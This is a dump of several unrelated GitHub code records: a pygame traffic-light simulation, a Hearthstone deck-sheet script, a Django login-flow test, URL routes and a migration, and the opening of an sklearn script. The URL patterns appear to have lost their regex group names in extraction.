cursor.execute(\"SELECT deck_name, deck_archetype FROM deckstrings.decks WHERE playoff_region = '%(region)s' and date > '2019_01_01'\" % locals())\n player_decks = {}\n output_file.write(\"Player,Deck1,Deck2,Deck3,Deck4\\n\")\n for deck_name, deck_archetype in cursor.fetchall():\n if deck_name not in player_decks:\n player_decks[deck_name] = []\n player_decks[deck_name].append('\"' + deck_archetype + '\"')\n\n for i in player_decks:\n player_decks[i].sort(key=lambda x:x.split(' ')[-1])\n\n lineups = {}\n for i, j in sorted(player_decks.items(), key=lambda x:x[0].lower()):\n lineups[tuple(j)] = lineups.get(tuple(j), []) + [i]\n output_file.write('\"' + i + '\",')\n output_file.write(\",\".join(j))\n output_file.write(\"\\n\")\n output_file.write('\\n\\n')\n num_players = len(player_decks.keys())\n output_file.write(\"Deck1,Deck2,Deck3,Deck4,Percent of Field,,Players\\n\")\n for lu, players in sorted(lineups.items(), key=lambda x:len(x[1]), reverse=True):\n output_file.write(\",\".join(list(lu)) + \",\" + str(round(len(players) / float(num_players) * 100, 1)) + \",,\" + \",\".join(players) + '\\n')\n\ndef archetype_percents():\n output_file = open('NA_sheets/Archetypes.csv', 'w')\n output_file.write(\"Archetype,Number,Percentage of Decks\\n\")\n region = 'NA'\n total = 0\n cursor.execute(\"select deck_archetype, deck_class, count(deck_archetype) as total FROM deckstrings.decks WHERE playoff_region = '%(region)s' and date > '2019_01_01' group by deck_archetype, deck_class order by deck_class, total desc\" % locals())\n archetypes = []\n for i,j,k in cursor.fetchall():\n i = '\"' + i + '\"'\n k = int(k)\n archetypes.append((i,k))\n total += k\n for i,j in archetypes:\n output_file.write(\",\".join([i, str(j), str(round(j/float(total) * 100, 1))]) + '\\n')\n\narchetype_percents()\n \n\nmake_lineups_sheet()\n\nregion = 'NA'\ncursor.execute(\"SELECT distinct deck_archetype FROM deckstrings.decks WHERE playoff_region = '%(region)s' and date > '2019_01_01'\" % locals())\nfor (archetype,) in cursor.fetchall():\n make_archetype_sheet(archetype)\n\n\n","repo_name":"jegutman/hearthstone_decks","sub_path":"PlayoffLoader/make_tournament_sheets.py","file_name":"make_tournament_sheets.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"28156630085","text":"from ast import If\nfrom pickle import NONE\nfrom random import randint\nimport sys\nfrom time import time\nfrom tkinter import CENTER, font\nfrom tracemalloc import start\nfrom turtle import color\nimport pygame\nfrom sys import exit\nimport time\nimport math\n\n\ndef update_score(score, high_score):\n if score > high_score:\n high_score = score\n return high_score\n\n\ndef car_movement(car_list):\n if car_list:\n for car_rect in car_list:\n if car_rect.x > 500:\n screen.blit(car, car_rect)\n car_list = [car for car in car_list if car.x > 1100]\n\n return car_list\n else:\n return []\n\n\ndef display_score():\n\n current_time = int(pygame.time.get_ticks() / 1000) - start_time\n infoAttempt = game_font.render(\n f'Attempts: {nrOfAttempts}', False, (65, 65, 65))\n infoAttempt_rect = infoAttempt.get_rect(center=(180, 380))\n info_surfQ = game_font.render(\n f\"s- Stop\", False, (70, 70, 70))\n info_rectQ = info_surfQ.get_rect(center=(720, 120))\n score_surf = game_font.render(\n f'Score: {current_time} s', False, (60, 60, 60))\n score_rect = score_surf.get_rect(center=(180, 120))\n screen.blit(score_surf, score_rect)\n screen.blit(info_surfQ, info_rectQ)\n screen.blit(infoAttempt, infoAttempt_rect)\n if current_time == 0:\n current_time = 1\n return current_time\n else:\n return current_time\n\n\ndef blitRotateCenter(surf, image, topleft, angle):\n\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(\n center=image.get_rect(topleft=topleft).center)\n\n surf.blit(rotated_image, new_rect)\n\n\n# start\npygame.init()\nscreen = pygame.display.set_mode((1000, 500))\npygame.display.set_caption(\"Traffic Light System\")\n\nPATH = [(175, 119), (110, 70), (56, 133), (70, 481), (318, 731), (404, 680), (418, 521), (507, 475), (600, 551), (613, 715), (736, 713),\n (734, 399), (611, 357), (409, 343), (433, 257), (697, 258), (738, 123), (581, 71), (303, 78), (275, 377), (176, 388), (178, 260)]\n\nclock = pygame.time.Clock()\ngame_active = False\nstart_time = 0\nscore = 0\ngame_font = pygame.font.Font('font/Pixeltype.ttf', 50)\ngame_font1 = pygame.font.Font('font/Pixeltype.ttf', 30)\nhigh_score = 0\nnrOfAttempts = 0\n\n# intro\ngame_name = game_font.render('Traffic control simulation', False, (65, 65, 65))\ngame_name_rect = game_name.get_rect(center=(480, 200))\ngame_message = game_font.render('Press SPACE to start', False, (255, 255, 255))\ngame_message_rect = game_message.get_rect(center=(480, 280))\n\n\n# roads\nroadFromLeft = pygame.Surface([1000, 100])\nroadFromLeft.fill((128, 128, 118))\nroadFromLeft_rect = roadFromLeft.get_rect(topleft=(0, 200))\n\nroadFromTop = pygame.Surface([100, 500])\nroadFromTop.fill((128, 128, 118))\nroadFromTop_rect = roadFromTop.get_rect(topleft=(450, 0))\n\nroadOutlineHorizontal = pygame.Surface([450, 10])\nroadOutlineHorizontal.fill((160, 154, 154))\nroadOutlineHorizontal_rect = roadOutlineHorizontal.get_rect(topleft=(0, 190))\n\nroadOutlineVertical = pygame.Surface([10, 200])\nroadOutlineVertical.fill((160, 154, 154))\nroadOutlineVertical_rect = roadOutlineVertical.get_rect(topleft=(440, 0))\n\n# cars from left\ncar = pygame.image.load('graphics/car.png').convert_alpha()\ncar = pygame.transform.scale(car, (15, 12))\ncar_rect = car.get_rect(topleft=(10, 275))\nsides = ['top', 'bottom', 'left', 'right']\n\ncar1 = pygame.image.load('graphics/car.png').convert_alpha()\ncar1 = pygame.transform.scale(car1, (15, 12))\ncar_rect1 = car1.get_rect(topleft=(10, 255))\n\n\n# cars from right\ncar2 = pygame.image.load('graphics/carLeft.png').convert_alpha()\ncar2 = pygame.transform.scale(car2, (15, 12))\ncar_rect2 = car2.get_rect(topleft=(980, 205))\n\n\ncar3 = pygame.image.load('graphics/carLeft.png').convert_alpha()\ncar3 = pygame.transform.scale(car3, (15, 12))\ncar_rect3 = car3.get_rect(topleft=(980, 230))\n\n# cars from top 4 && 5\ncar4 = pygame.image.load('graphics/carT.png').convert_alpha()\ncar4 = pygame.transform.scale(car4, (15, 12))\ncar_rect4 = car4.get_rect(topleft=(450, 10))\n\n\ncar5 = pygame.image.load('graphics/carD.png').convert_alpha()\ncar5 = pygame.transform.scale(car5, (15, 12))\ncar_rect5 = car5.get_rect(topleft=(530, 480))\n\n\ncars = [car, car1, car2, car3, car4, car5]\n# traffic light\nyellow = (249, 215, 30)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\n\nlight_on = 0\n\n\nlight = pygame.Surface([10, 10])\nlight.fill((0, 0, 0))\nlight_rect = light.get_rect(topleft=(440, 269))\n\nred_light = pygame.Surface([7, 7])\nred_light.fill(red)\nred_light_rect = light.get_rect(topleft=(440, 269))\n\n\ngreen_light = pygame.Surface([7, 7])\ngreen_light.fill(green)\ngreen_light_rect = light.get_rect(topleft=(440, 269))\n\n\nyellow_light = pygame.Surface([7, 7])\nyellow_light.fill(yellow)\nyellow_light_rect = light.get_rect(topleft=(440, 269))\n\n# traffic light left\nlight_onL = 0\n\n\nlightL = pygame.Surface([10, 10])\nlightL.fill((0, 0, 0))\nlight_rect_L = lightL.get_rect(topleft=(560, 220))\n\nred_lightL = pygame.Surface([7, 7])\nred_lightL.fill(red)\nred_light_rect_L = lightL.get_rect(topleft=(560, 220))\n\n\ngreen_lightL = pygame.Surface([7, 7])\ngreen_lightL.fill(green)\ngreen_light_rect_L = lightL.get_rect(topleft=(560, 220))\n\n\nyellow_lightL = pygame.Surface([7, 7])\nyellow_lightL.fill(yellow)\nyellow_light_rect_L = lightL.get_rect(topleft=(560, 220))\n\n\n# traffic light top\nlight_onT = 0\n\n\nlightT = pygame.Surface([10, 10])\nlightT.fill((0, 0, 0))\nlight_rect_T = lightT.get_rect(topleft=(470, 200))\n\nred_lightT = pygame.Surface([7, 7])\nred_lightT.fill(red)\nred_light_rect_T = lightT.get_rect(topleft=(470, 200))\n\n\ngreen_lightT = pygame.Surface([7, 7])\ngreen_lightT.fill(green)\ngreen_light_rect_T = lightT.get_rect(topleft=(470, 200))\n\n\nyellow_lightT = pygame.Surface([7, 7])\nyellow_lightT.fill(yellow)\nyellow_light_rect_T = lightT.get_rect(topleft=(470, 200))\n\n# traffic light down\nlight_onD = 0\n\n\nlightD = pygame.Surface([10, 10])\nlightD.fill((0, 0, 0))\nlight_rect_D = lightD.get_rect(topleft=(521, 297))\n\nred_lightD = pygame.Surface([7, 7])\nred_lightD.fill(red)\nred_light_rect_D = lightD.get_rect(topleft=(521, 297))\n\n\ngreen_lightD = pygame.Surface([7, 7])\ngreen_lightD.fill(green)\ngreen_light_rect_D = lightD.get_rect(topleft=(521, 297))\n\n\nyellow_lightD = pygame.Surface([7, 7])\nyellow_lightD.fill(yellow)\nyellow_light_rect_D = lightD.get_rect(topleft=(521, 297))\n\n# timers\n# traffic\ntraffic_timer = pygame.USEREVENT + 0\npygame.time.set_timer(traffic_timer, 1500)\n\ncar_timer = pygame.USEREVENT + 1\npygame.time.set_timer(car_timer, 2000)\n\n# start of the loop\nwhile True:\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n if game_active:\n if event.type == car_timer:\n screen.blit(car, car_rect)\n cars.append(car.get_rect(topleft=(10, 275)))\n\n if event.type == traffic_timer:\n\n light_onD += 1\n light_onT += 1\n light_onL += 1\n light_on += 1\n\n # down light\n if light_onD == 3:\n light_onD = 0\n\n if light_onD == 0:\n light_onD = 0\n light_onT = 0\n light_onL = 1\n light_on = 1\n\n if light_onD == 1:\n if light_on == 2 and light_onL == 2:\n light_onD = 0\n elif light_on == 0 and light_onL == 0:\n light_onD = 0\n else:\n light_onD = 1\n\n if light_onD == 2:\n if light_on == 1 or light_onL == 1:\n light_onL = 0\n light_on = 0\n light_onT = 2\n elif light_on == 0 and light_rect_L == 0:\n light_onD = 2\n else:\n light_onD = 0\n\n # from top\n if light_onT == 3:\n light_onT = 0\n\n if light_onT == 0:\n light_onD = 0\n light_onT = 0\n light_onL = 1\n light_on = 1\n\n if light_onT == 1:\n if light_on == 2 and light_onL == 2:\n light_onT = 0\n elif light_on == 0 and light_onL == 0:\n light_onT = 0\n else:\n light_onT = 1\n\n if light_onT == 2:\n if light_on == 1 or light_onL == 1:\n light_on = 0\n light_onL = 0\n light_onT = 2\n elif light_on == 0 and light_onL == 0:\n light_onT = 2\n else:\n light_onT = 0\n light_on = 2\n light_onL = 2\n\n if light_onL == 3: # RED\n light_onL = 0 # RED\n\n if light_onL == 0:\n light_onL = 0\n light_on = 0\n\n if light_onL == 2:\n if light_onD == 2 or light_onT == 2:\n light_onL = 2\n light_onD = 0\n light_onT = 0\n elif light_onD == 0 and light_onT == 0:\n light_onL = 2\n else:\n light_onL = 0\n\n if light_onL == 1:\n if light_onD == 2 and light_onT == 2:\n light_onL = 0\n elif light_onD == 0 and light_onT == 0:\n light_onL = 1\n else:\n light_onL = 1\n\n if light_on == 3:\n light_on = 0\n\n if light_on == 0:\n light_onL = 0\n light_on = 0\n\n if light_on == 2:\n if light_onT == 1 or light_onD == 1:\n light_on = 2\n light_onD = 0\n light_onT = 0\n elif light_onT == 0 and light_onD == 0:\n light_on = 2\n else:\n light_on = 0\n\n if light_on == 1:\n if light_onD == 2 and light_onT == 2:\n light_on = 0\n elif light_onD == 0 and light_onT == 0:\n light_on = 1\n else:\n light_on = 1\n\n else:\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n game_active = True\n if (start_time > 0):\n break\n else:\n nrOfAttempts += 1\n start_time = int(pygame.time.get_ticks() / 1000)\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n game_active = False\n\n if game_active:\n\n # drawing map\n screen.fill((86, 125, 70))\n screen.blit(roadFromLeft, roadFromLeft_rect)\n screen.blit(roadFromTop, roadFromTop_rect)\n screen.blit(roadOutlineHorizontal, roadOutlineHorizontal_rect)\n screen.blit(roadOutlineHorizontal, ((0, 290)))\n screen.blit(roadOutlineHorizontal, ((550, 190)))\n screen.blit(roadOutlineHorizontal, ((550, 290)))\n screen.blit(roadOutlineVertical, roadOutlineVertical_rect)\n screen.blit(roadOutlineVertical, (550, 0))\n screen.blit(roadOutlineVertical, (440, 300))\n screen.blit(roadOutlineVertical, (550, 300))\n screen.blit(car5, car_rect5)\n screen.blit(car4, car_rect4)\n screen.blit(car3, car_rect3)\n screen.blit(car2, car_rect2)\n screen.blit(car1, car_rect1)\n screen.blit(car, car_rect)\n score = display_score()\n high_score = update_score(score, high_score)\n\n # traffic light\n if light_on == 0: # RED LIGHT\n light = screen.blit(red_light, red_light_rect)\n if car_rect.x < 420 or car_rect.x > 490:\n car_rect.x += 5\n if car_rect1.x < 420 or car_rect1.x > 490:\n car_rect1.x += 5\n elif light_on == 1: # YELLOW LIGHT\n light = screen.blit(yellow_light, yellow_light_rect)\n if car_rect.x > 380 and car_rect.x < 490:\n car_rect.x += 3\n else:\n car_rect.x += 5\n if car_rect1.x > 380 and car_rect1.x < 490:\n car_rect1.x += 3\n else:\n car_rect1.x += 5\n elif light_on == 2: # GREEN LIGHT\n light = screen.blit(green_light, green_light_rect)\n car_rect.x += 5\n car_rect1.x += 5\n\n if car_rect.x and car_rect1.x > 1100:\n car_rect.left = 10\n car_rect1.left = 10\n\n # traffic light from left\n if light_onL == 0: # RED LIGHT\n lightL = screen.blit(red_lightL, red_light_rect_L)\n if car_rect2.x > 560 or car_rect2.x < 450:\n car_rect2.x -= 5\n if car_rect3.x > 560 or car_rect3.x < 450:\n car_rect3.x -= 5\n elif light_onL == 1: # YELLOW LIGHT\n lightL = screen.blit(yellow_lightL, yellow_light_rect_L)\n if car_rect2.x > 530 and car_rect2.x < 600:\n car_rect2.x -= 3\n else:\n car_rect2.x -= 5\n if car_rect3.x > 530 and car_rect3.x < 600:\n car_rect3.x -= 3\n else:\n car_rect3.x -= 5\n elif light_onL == 2: # GREEN LIGHT\n lightL = screen.blit(green_lightL, green_light_rect_L)\n car_rect2.x -= 5\n car_rect3.x -= 5\n\n if car_rect2.x and car_rect3.x < -100:\n car_rect2.left = 980\n car_rect3.left = 980\n\n # traffic light from top\n if light_onT == 0: # RED LIGHT\n lightT = screen.blit(red_lightT, red_light_rect_T)\n if car_rect4.y > 220 or car_rect4.y < 180:\n car_rect4.y += 5\n elif light_onT == 1: # YELLOW LIGHT\n lightT = screen.blit(yellow_lightT, yellow_light_rect_T)\n if car_rect4.y > 250 and car_rect4.y < 300:\n car_rect4.y += 3\n else:\n car_rect4.y += 5\n elif light_onT == 2: # GREEN LIGHT\n lightT = screen.blit(green_lightT, green_light_rect_T)\n car_rect4.y += 5\n\n if car_rect4.y > 600:\n car_rect4.bottom = 15\n\n # traffic light from down\n if light_onD == 0: # RED LIGHT\n lightD = screen.blit(red_lightD, red_light_rect_D)\n if car_rect5.y > 300 or car_rect5.y < 250: # 0 - 500\n car_rect5.y -= 5\n elif light_onD == 1: # YELLOW LIGHT\n lightD = screen.blit(yellow_lightD, yellow_light_rect_D)\n if car_rect5.y > 250 and car_rect5.y < 300:\n car_rect5.y -= 3\n else:\n car_rect5.y -= 5\n elif light_onD == 2: # GREEN LIGHT\n lightD = screen.blit(green_lightD, green_light_rect_D)\n car_rect5.y -= 5\n\n if car_rect5.y < -100:\n car_rect5.bottom = 490\n\n # drawing roads\n pygame.draw.line(roadFromLeft, 'gold', (0, 45), (440, 45), 4)\n pygame.draw.line(roadFromLeft, 'gold', (560, 45), (1000, 45), 4)\n pygame.draw.line(roadFromTop, 'gold', (50, 0), (50, 190), 4)\n pygame.draw.line(roadFromTop, 'gold', (50, 300), (50, 500), 4)\n # -- top left --\n pygame.draw.line(roadFromLeft, 'gold', (1, 22), (10, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (20, 22), (30, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (40, 22), (50, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (60, 22), (70, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (80, 22), (90, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (100, 22), (110, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (120, 22), (130, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (140, 22), (150, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (160, 22), (170, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (180, 22), (190, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (200, 22), (210, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (220, 22), (230, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (240, 22), (250, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (260, 22), (270, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (280, 22), (290, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (300, 22), (310, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (320, 22), (330, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (340, 22), (350, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (360, 22), (370, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (380, 22), (390, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (400, 22), (410, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (420, 22), (430, 22), 1)\n # -- bottom left --\n pygame.draw.line(roadFromLeft, 'gold', (1, 72), (10, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (20, 72), (30, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (40, 72), (50, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (60, 72), (70, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (80, 72), (90, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (100, 72), (110, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (120, 72), (130, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (140, 72), (150, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (160, 72), (170, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (180, 72), (190, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (200, 72), (210, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (220, 72), (230, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (240, 72), (250, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (260, 72), (270, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (280, 72), (290, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (300, 72), (310, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (320, 72), (330, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (340, 72), (350, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (360, 72), (430, 72), 3)\n\n # -- right top --\n pygame.draw.line(roadFromLeft, 'gold', (1000, 22), (990, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (980, 22), (970, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (960, 22), (950, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (940, 22), (930, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (920, 22), (910, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (900, 22), (890, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (880, 22), (870, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (860, 22), (850, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (840, 22), (830, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (820, 22), (810, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (800, 22), (790, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (780, 22), (770, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (760, 22), (750, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (740, 22), (730, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (720, 22), (710, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (700, 22), (690, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (680, 22), (670, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (660, 22), (650, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (640, 22), (570, 22), 3)\n\n # -- right left --\n pygame.draw.line(roadFromLeft, 'gold', (1000, 72), (990, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (980, 72), (970, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (960, 72), (950, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (940, 72), (930, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (920, 72), (910, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (900, 72), (890, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (880, 72), (870, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (860, 72), (850, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (840, 72), (830, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (820, 72), (810, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (800, 72), (790, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (780, 72), (770, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (760, 72), (750, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (740, 72), (730, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (720, 72), (710, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (700, 72), (690, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (680, 72), (670, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (660, 72), (650, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (640, 72), (630, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (620, 72), (610, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (600, 72), (590, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (580, 72), (570, 72), 1)\n\n # -- upper road--\n pygame.draw.line(roadFromTop, 'gold', (50, 0), (50, 190), 4)\n\n pygame.draw.line(roadFromTop, 'gold', (23, 0), (23, 10), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 20), (23, 30), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 40), (23, 50), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 60), (23, 70), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 80), (23, 90), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 100), (23, 110), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 120), (23, 190), 3)\n\n pygame.draw.line(roadFromTop, 'gold', (73, 0), (73, 10), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 20), (73, 30), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 40), (73, 50), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 60), (73, 70), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 80), (73, 90), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 100), (73, 110), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 120), (73, 130), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 140), (73, 150), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 160), (73, 170), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 180), (73, 190), 1)\n\n # lower road\n pygame.draw.line(roadFromTop, 'gold', (50, 300), (50, 500), 4)\n\n pygame.draw.line(roadFromTop, 'gold', (23, 300), (23, 310), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 320), (23, 330), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 340), (23, 350), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 360), (23, 370), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 380), (23, 390), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 400), (23, 410), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 420), (23, 430), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 440), (23, 450), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 460), (23, 470), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 480), (23, 490), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 497), (23, 500), 1)\n\n pygame.draw.line(roadFromTop, 'gold', (73, 310), (73, 380), 3)\n pygame.draw.line(roadFromTop, 'gold', (73, 390), (73, 400), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 410), (73, 420), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 430), (73, 440), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 450), (73, 460), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 470), (73, 480), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 490), (73, 500), 1)\n else:\n screen.fill((4, 159, 65))\n start_time = 0\n light_on = 0\n car_rect.x = 0\n car_rect1.x = 0\n car_rect2.x = 990\n car_rect3.x = 990\n car_rect4.y = 10\n car_rect5.y = 490\n score_message_again = game_font.render(\n f'Press SPACE to start again', False, (65, 65, 65))\n score_message_again_rect = score_message_again.get_rect(\n center=(480, 260))\n score_message = game_font.render(\n f'Your score: {score}', False, (65, 65, 65))\n score_message_rect = score_message.get_rect(center=(480, 180))\n high_score_surface = game_font.render(\n f'High score: {high_score}', False, (255, 255, 255))\n high_score_rect = high_score_surface.get_rect(center=(480, 340))\n\n if score == 0:\n screen.blit(game_name, game_name_rect)\n screen.blit(game_message, game_message_rect)\n else:\n screen.blit(score_message_again, score_message_again_rect)\n screen.blit(score_message, score_message_rect)\n screen.blit(high_score_surface, high_score_rect)\n\n pygame.display.update()\n clock.tick(60)\n","repo_name":"Andrija121/IndividualProject","sub_path":"IndividualProject.py","file_name":"IndividualProject.py","file_ext":"py","file_size_in_byte":25048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19791399959","text":"from . import login, login_person\nfrom ..factories import PersonFactory\nfrom http import HTTPStatus\nimport urllib\n\n\nclass TestLoginFlow:\n def test_redirect_on_login(self, testapp, db, person, carpool):\n cancel_carpool_url = '/carpools/{}/cancel'.format(carpool.uuid)\n res = testapp.get(cancel_carpool_url)\n res = res.follow()\n res = login_person(testapp, person, follow=False)\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == cancel_carpool_url\n\n def test_dupe_email_login(self, testapp, db, person, carpool):\n # Steve logs in once using his Facebook account\n res = login(testapp, 'steve@facebook', 'stevejobs', 'steve@example.com')\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == '/profile'\n\n # ... then logs out\n res = testapp.post('/logout')\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == '/'\n\n # Steve tries to login again, this time using Google\n res = login(testapp, 'steve@google', 'stevejobs', 'steve@example.com')\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == '/login'\n","repo_name":"RagtagOpen/nomad","sub_path":"tests/functional/test_login_flow.py","file_name":"test_login_flow.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"12931359205","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^new/$', views.idea_new, name='idea_new'),\n url(r'^$', views.idea_list, name=\"idea_list\" ),\n url(r'^(?P\\d+)/$', views.idea_detail, name='idea_detail'),\n url(r'^(?P\\d+)/edit/$', views.idea_edit, name='idea_edit'),\n url(r'^(?P\\d+)/del/$', views.idea_del, name='idea_del'),\n url(r'^(?P\\d+)/comment/(?P\\d+)/edit/$', views.comment_edit, name='comment_edit'),\n url(r'^(?P\\d+)/comment/(?P\\d+)/del/$', views.comment_del, name='comment_del'),\n #Sample\n url(r'^location/$', views.location, name=\"location\")\n]\n","repo_name":"sarkmen/hackerthon","sub_path":"idea/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17220639453","text":"from __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('projects', '0087_resource_deleted'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='resource',\n options={'ordering': ['name', 'type', 'location', 'description'], 'permissions': (('view_resource', 'Can view a resource of a project'), ('trash_resource', 'Can trash a resource'), ('restore_resource', 'Can restore a resource'), ('change_project_resource', 'Can change the project of a resource'), ('add_resource_without_project', 'Can add a resource without a project')), 'verbose_name': 'Resource', 'verbose_name_plural': 'Resources'},\n ),\n ]\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/projects/migrations/0088_resources_meta_changes.py","file_name":"0088_resources_meta_changes.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"6629687263","text":"import pandas as pd\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.preprocessing import scale\r\nfrom typing import Tuple\r\n\r\nimport sys\r\nsys.path.append(\"..\")\r\ncolumns = [\r\n \"Class\",\r\n \"Alcohol\",\r\n \"Malic acid\",\r\n 